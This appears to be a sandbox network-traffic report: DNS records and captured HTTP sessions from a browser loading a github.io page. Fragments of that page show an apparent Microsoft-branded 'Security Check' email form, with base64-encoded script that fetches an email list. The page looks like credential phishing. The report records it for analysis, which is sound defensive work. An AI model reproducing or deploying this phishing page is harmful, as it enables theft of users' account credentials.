                                                        Jan 12, 2025 01:24:49.813424110 CET1.1.1.1192.168.2.60x5cbeNo error (0)procustodiavalueslive.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.813424110 CET1.1.1.1192.168.2.60x5cbeNo error (0)procustodiavalueslive.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.813424110 CET1.1.1.1192.168.2.60x5cbeNo error (0)procustodiavalueslive.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.813424110 CET1.1.1.1192.168.2.60x5cbeNo error (0)procustodiavalueslive.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:50.698414087 CET1.1.1.1192.168.2.60x9d16No error (0)procustodiavalueslive.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:50.698414087 CET1.1.1.1192.168.2.60x9d16No error (0)procustodiavalueslive.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:50.698414087 CET1.1.1.1192.168.2.60x9d16No error (0)procustodiavalueslive.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:50.698414087 CET1.1.1.1192.168.2.60x9d16No error (0)procustodiavalueslive.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:06.176316023 CET1.1.1.1192.168.2.60xb88cNo error (0)militarplus.com72.167.84.16A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:06.179275990 CET1.1.1.1192.168.2.60xdecdNo error (0)militarplus.com65IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.133088112 CET1.1.1.1192.168.2.60xfca0No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.133353949 CET1.1.1.1192.168.2.60xc101No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.133353949 CET1.1.1.1192.168.2.60xc101No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.133353949 CET1.1.1.1192.168.2.60xc101No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.133353949 CET1.1.1.1192.168.2.60xc101No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.133353949 CET1.1.1.1192.168.2.60xc101No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.699604988 CET1.1.1.1192.168.2.60xf3eeNo error (0)militarplus.com72.167.84.16A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.704169035 CET1.1.1.1192.168.2.60x6549No error (0)militarplus.com65IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.294703007 CET1.1.1.1192.168.2.60x24b5No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.297559977 CET1.1.1.1192.168.2.60x320eNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.297559977 CET1.1.1.1192.168.2.60x320eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.297559977 CET1.1.1.1192.168.2.60x320eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.297559977 CET1.1.1.1192.168.2.60x320eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.297559977 CET1.1.1.1192.168.2.60x320eNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.309648991 CET1.1.1.1192.168.2.60x1087No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.309648991 CET1.1.1.1192.168.2.60x1087No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.324898005 CET1.1.1.1192.168.2.60x8d5dNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.352129936 CET1.1.1.1192.168.2.60xd560No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.352129936 CET1.1.1.1192.168.2.60xd560No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.354080915 CET1.1.1.1192.168.2.60x2114No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.354080915 CET1.1.1.1192.168.2.60x2114No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.354918957 CET1.1.1.1192.168.2.60x54aNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.354918957 CET1.1.1.1192.168.2.60x54aNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.354918957 CET1.1.1.1192.168.2.60x54aNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.364870071 CET1.1.1.1192.168.2.60xb50No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.364870071 CET1.1.1.1192.168.2.60xb50No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.109561920 CET1.1.1.1192.168.2.60xae4fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.109561920 CET1.1.1.1192.168.2.60xae4fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.220483065 CET1.1.1.1192.168.2.60x38f1No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.220483065 CET1.1.1.1192.168.2.60x38f1No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.469373941 CET1.1.1.1192.168.2.60x6825No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.469373941 CET1.1.1.1192.168.2.60x6825No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.469373941 CET1.1.1.1192.168.2.60x6825No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.469831944 CET1.1.1.1192.168.2.60xbd74No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.469831944 CET1.1.1.1192.168.2.60xbd74No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        • procustodiavalueslive.github.io
                                                        • https:
                                                          • militarplus.com
                                                          • cdn.socket.io
                                                          • www.w3schools.com
                                                          • aadcdn.msftauth.net
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649708185.199.108.153801444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 12, 2025 01:24:49.333018064 CET517OUTGET /mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ HTTP/1.1
                                                        Host: procustodiavalueslive.github.io
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Jan 12, 2025 01:24:49.787590027 CET789INHTTP/1.1 301 Moved Permanently
                                                        Connection: keep-alive
                                                        Content-Length: 162
                                                        Server: GitHub.com
                                                        Content-Type: text/html
                                                        permissions-policy: interest-cohort=()
                                                        Location: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
                                                        X-GitHub-Request-Id: 41FB:3C3B5B:2055062:24D2B18:67830BD1
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Sun, 12 Jan 2025 00:24:49 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-ewr-kewr1740063-EWR
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1736641490.729374,VS0,VE17
                                                        Vary: Accept-Encoding
                                                        X-Fastly-Request-ID: 1a5eed52d3b06122acafcff70073699236e50b42
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                        Jan 12, 2025 01:25:34.794701099 CET6OUTData Raw: 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649709185.199.108.153801444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 12, 2025 01:25:34.324398041 CET6OUTData Raw: 00
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649710185.199.110.1534431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:24:50 UTC745OUTGET /mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ HTTP/1.1
                                                        Host: procustodiavalueslive.github.io
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:24:50 UTC736INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 19100
                                                        Server: GitHub.com
                                                        Content-Type: text/html; charset=utf-8
                                                        permissions-policy: interest-cohort=()
                                                        Last-Modified: Wed, 11 Dec 2024 16:24:08 GMT
                                                        Access-Control-Allow-Origin: *
                                                        Strict-Transport-Security: max-age=31556952
                                                        ETag: "6759bca8-4a9c"
                                                        expires: Sun, 12 Jan 2025 00:34:50 GMT
                                                        Cache-Control: max-age=600
                                                        x-proxy-cache: MISS
                                                        X-GitHub-Request-Id: C0B9:191F96:20FB513:2579BF1:67830BD1
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Sun, 12 Jan 2025 00:24:50 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-ewr-kewr1740046-EWR
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1736641490.368999,VS0,VE17
                                                        Vary: Accept-Encoding
                                                        X-Fastly-Request-ID: 7d8ed58494c7a1e65ca077041e9ae764afbd6509
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 54 69 74 6c 65 73 20 61 72 72 61 79 20 77 69 74 68 20 64 69 66 66 65 72 65 6e 74 20 76 61 72 69 61 74 69 6f 6e 73 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 74 69 74 6c 65 73 20 3d 20 5b 0d 0a 09 09 09 0d 0a 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script> // Titles array with different variations const titles = [
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 27 29 3b 20 2f 2a 20 44 65 66 61 75 6c 74 20 66 61 6c 6c 62 61 63 6b 20 69 6d 61 67 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 37 38 64 34 3b 0d 0a 20 20 20 20
                                                        Data Ascii: 33; background-image: url(''); /* Default fallback image */ background-size: cover; background-position: center; } .header { width: 100%; background-color: #0078d4;
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72
                                                        Data Ascii: .container input[type="email"] { width: 100%; padding: 10px; margin-bottom: 20px; border: 1px solid #ccc; border-radius: 3px; font-size: 16px; box-sizing: bor
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 79 20 43 68 65 63 6b 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4e 34 41 41 41 41 77 43 41 59 41 41 41 42 2b 4b 63 52 46 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 45 58 4e 4a 52 45 46 55 65 46 37 74 58 58 2b 63 58 46 56 31 50 2b 66 4e 62 70 61 6b 6a 50 78 53 53 59 43 67 2f 4b 68 55 43 69 57 69 38 6b 4f 69 43 4a 52 41 50 39 71 43 59 72 43 6f 6f 46 52 41 53 56 32 79 38 2b 37 62 54 62 55 56 42 72 55 6d 32 58 6e 33 7a 59 62 56 46 50 6d 49 50 35
                                                        Data Ascii: y Check</span> </div> <div class="container"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAN4AAAAwCAYAAAB+KcRFAAAAAXNSR0IArs4c6QAAEXNJREFUeF7tXX+cXFV1P+fNbpakjPxSSYCg/KhUCiWi8kOiCJRAP9qCYrCooFRASV2y8+7bTbUVBrUm2Xn3zYbVFPmIP5
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 41 76 67 76 5a 65 49 2f 74 59 41 33 6a 66 43 4d 48 78 58 4a 32 74 41 43 48 45 48 41 4a 79 70 6c 66 30 36 45 51 32 59 61 67 63 41 4e 41 47 76 57 43 7a 75 4e 54 55 31 31 65 52 54 52 4d 54 66 6d 49 64 78 32 78 67 4b 68 63 4c 2b 6e 75 65 39 44 51 42 4f 42 49 41 6a 41 57 41 66 50 70 34 43 41 4c 73 6a 2b 44 42 2f 5a 7a 36 66 76 35 63 50 2f 66 58 36 49 79 4d 6a 68 79 69 6c 75 47 79 44 45 48 46 4c 71 56 54 36 72 31 54 74 66 62 4e 53 61 67 55 41 48 41 51 41 7a 79 69 6c 76 6c 49 75 6c 78 2b 78 73 56 38 49 63 54 77 41 6e 41 45 41 78 37 41 52 41 52 48 37 6c 56 4b 37 45 58 45 43 41 42 37 71 36 2b 75 37 64 66 33 36 39 66 78 33 52 35 52 71 44 57 38 6a 6f 74 4d 51 38 53 67 41 32 49 2b 49 75 4c 30 6e 69 4f 67 52 33 68 7a 4e 37 37 45 31 7a 43 36 64 70 55 75 58 76 67 55 52
                                                        Data Ascii: AvgvZeI/tYA3jfCMHxXJ2tACHEHAJyplf06EQ2YagcANAGvWCzuNTU11eRTRMTfmIdx2xgKhcL+nue9DQBOBIAjAWAfPp4CALsj+DB/Zz6fv5cP/fX6IyMjhyiluGyDEHFLqVT6r1TtfbNSagUAHAQAzyilvlIulx+xsV8IcTwAnAEAx7ARARH7lVK7EXECAB7q6+u7df369fx3R5RqDW8jotMQ8SgA2I+IuL0niOgR3hzN77E1zC6dpUuXvgUR
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 76 4c 38 2f 7a 74 6c 65 72 56 54 37 44 4c 6a 42 34 77 49 48 63 35 30 73 70 74 2b 76 50 2b 61 78 56 71 56 51 2b 6e 67 5a 2b 6d 32 78 72 2b 45 66 54 63 4b 79 4b 55 65 43 4a 36 65 6e 70 77 38 66 48 78 33 65 62 46 59 55 51 5a 79 56 52 50 72 74 31 55 33 37 43 2f 37 63 6d 2f 47 65 4a 62 64 4a 4e 2f 66 33 39 6c 36 78 62 74 34 37 42 31 79 44 75 63 39 47 69 52 5a 38 6c 6f 6f 76 4d 43 6f 6e 68 35 66 31 52 46 4e 32 67 50 35 38 7a 71 32 5a 58 4b 2f 62 2f 53 65 46 32 77 4f 4e 50 46 45 4b 77 46 59 39 33 72 6a 6f 39 6c 38 2f 6e 46 78 65 4c 78 52 64 30 46 6f 79 4d 6a 42 77 56 78 2f 45 57 2f 52 6b 69 76 72 4f 65 33 64 41 72 34 4b 58 57 79 2f 39 4d 6e 50 70 37 47 56 4e 77 72 5a 54 79 38 6e 62 54 55 67 39 6c 79 67 49 65 49 6b 5a 68 47 48 4b 57 78 41 77 53 51 71 77 48 41 44
                                                        Data Ascii: vL8/ztlerVT7DLjB4wIHc50spt+vP+axVqVQ+ngZ+m2xr+EfTcKyKUeCJ6enpw8fHx3ebFYUQZyVRPrt1U37C/7cm/GeJbdJN/f39l6xbt47B1yDuc9GiRZ8loovMConh5f1RFN2gP58zq2ZXK/b/SeF2wONPFEKwFY93rjo9l8/nFxeLxRd0FoyMjBwVx/EW/RkivrOe3dAr4KXWy/9MnPp7GVNwrZTy8nbTUg9lygIeIkZhGHKWxAwSQqwHAD
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 75 4e 41 46 30 4a 77 79 46 71 54 4c 38 6c 55 61 7a 73 42 58 62 70 59 72 53 46 6a 62 59 44 48 44 76 4e 76 47 2b 33 2f 55 45 70 5a 38 78 46 6d 6b 52 44 69 72 77 47 67 70 6c 5a 71 31 48 51 57 72 6a 2f 33 66 66 2b 34 4e 4e 79 4c 66 58 59 63 57 7a 6d 44 45 4c 45 42 2b 69 41 49 72 69 43 69 32 6c 6d 78 54 6f 68 34 51 78 69 47 54 58 37 59 56 6d 50 30 66 5a 38 6a 69 39 69 76 31 79 44 7a 39 67 45 48 50 4f 73 73 7a 4e 30 5a 6a 37 75 7a 47 56 6d 49 69 42 32 79 72 47 61 78 67 37 6c 4f 56 76 57 6d 68 78 4b 50 58 52 59 63 4e 4b 77 76 4d 41 37 42 61 6a 68 36 73 77 42 51 66 39 2b 74 78 42 73 65 48 6a 35 65 4b 66 57 67 30 66 35 6b 50 70 2f 66 54 77 2b 2b 37 6d 5a 78 41 38 44 6c 55 73 71 57 64 35 69 6b 30 53 4d 63 67 73 66 71 71 47 65 32 72 5a 51 36 70 6c 77 75 2f 30 77 49
                                                        Data Ascii: uNAF0JwyFqTL8lUazsBXbpYrSFjbYDHDvNvG+3/UEpZ8xFmkRDirwGgplZq1HQWrj/3ff+4NNyLfXYcWzmDELEB+iAIriCi2lmxToh4QxiGTX7YVmP0fZ8ji9iv1yDz9gEHPOsszN0Zj7uzGVmIiB2yrGaxg7lOVvWmhxKPXRYcNKwvMA7Bajh6swBQf9+txBseHj5eKfWg0f5kPp/fTw++7mZxA8DlUsqWd5ik0SMcgsfqqGe2rZQ6plwu/0wI
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 71 78 32 36 42 6c 36 34 56 57 35 68 63 55 37 38 4f 65 42 30 43 4c 37 57 77 38 59 35 66 70 30 65 6c 6c 43 77 46 32 68 6b 58 65 75 4c 48 4d 31 59 4b 47 78 51 75 54 51 4b 44 50 39 30 68 41 4a 6f 53 65 57 64 7a 78 74 50 37 54 2b 38 42 35 61 73 67 4f 43 79 72 33 66 32 68 58 49 30 51 38 53 61 6c 56 43 47 4b 49 72 36 42 72 59 6d 47 68 6f 5a 65 6d 38 76 6c 4f 42 4f 6b 45 30 6d 31 75 56 71 74 66 6d 54 44 68 67 31 50 74 55 4a 70 45 41 54 48 45 42 46 48 34 4c 53 38 4e 6b 4f 72 75 79 64 52 69 7a 39 66 72 56 59 2f 31 69 37 44 59 6a 62 41 53 34 4f 2f 2b 58 78 37 72 4a 4e 34 47 67 64 73 50 31 71 79 65 2f 66 75 4c 32 54 39 55 67 2f 48 42 69 4a 69 4c 54 55 6e 6a 75 4f 48 79 75 58 79 50 65 32 32 36 69 41 49 5a 69 53 45 6d 6a 39 61 77 6d 72 73 77 4d 42 41 6b 79 51 6c 6f 68
                                                        Data Ascii: qx26Bl64VW5hcU78OeB0CL7Ww8Y5fp0ellCwF2hkXeuLHM1YKGxQuTQKDP90hAJoSeWdzxtP7T+8B5asgOCyr3f2hXI0Q8SalVCGKIr6BrYmGhoZem8vlOBOkE0m1uVqtfmTDhg1PtUJpEATHEBFH4LS8NkOruydRiz9frVY/1i7DYjbAS4O/+Xx7rJN4GgdsP1qye/fuL2T9Ug/HBiJiLTUnjuOHyuXyPe226iAIZiSEmj9awmrswMBAkyQloh
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 71 75 69 72 65 64 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 69 64 3d 22 63 6f 6e 74 69 6e 75 65 2d 62 75 74 74 6f 6e 22 3e 43 6f 6e 66 69 72 6d 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 42 79 20 63 6c 69 63 6b 69 6e 67 20 63 6f 6e 66 69 72 6d 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 46 32 35 30 32 31 3b 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 22 3e 4d 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d
                                                        Data Ascii: quired style="margin-top: 10px;"> <button id="continue-button">Confirm</button> <p class="footer">By clicking confirm <span style="color:#F25021;"><span style="font-weight: 700; background-color: rgb(255, 255, 255);">Mi<span style="font-
                                                        2025-01-12 00:24:50 UTC1378INData Raw: 33 51 67 5a 6e 4a 76 62 53 42 30 61 47 55 67 63 33 42 6c 59 32 6c 6d 61 57 56 6b 49 48 42 68 64 47 67 4e 43 6d 46 7a 65 57 35 6a 49 47 5a 31 62 6d 4e 30 61 57 39 75 49 47 78 76 59 57 52 46 62 57 46 70 62 45 78 70 63 33 51 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 48 56 7a 5a 56 5a 6c 63 6d 6c 6d 61 57 56 6b 52 57 31 68 61 57 78 4d 61 58 4e 30 49 44 30 39 50 53 41 78 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 52 79 65 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 49 47 46 33 59 57 6c 30 49 47 5a 6c 64 47 4e 6f 4b 47 56 74 59 57 6c 73 54 47 6c 7a 64 46 42 68 64 47 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 43 46 79
                                                        Data Ascii: 3QgZnJvbSB0aGUgc3BlY2lmaWVkIHBhdGgNCmFzeW5jIGZ1bmN0aW9uIGxvYWRFbWFpbExpc3QoKSB7DQogICAgaWYgKHVzZVZlcmlmaWVkRW1haWxMaXN0ID09PSAxKSB7DQogICAgICAgIHRyeSB7DQogICAgICAgICAgICBjb25zdCByZXNwb25zZSA9IGF3YWl0IGZldGNoKGVtYWlsTGlzdFBhdGgpOw0KICAgICAgICAgICAgaWYgKCFy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649712185.199.110.1534431444C:\Program Files\Google\Chrome\Application\chrome.exe
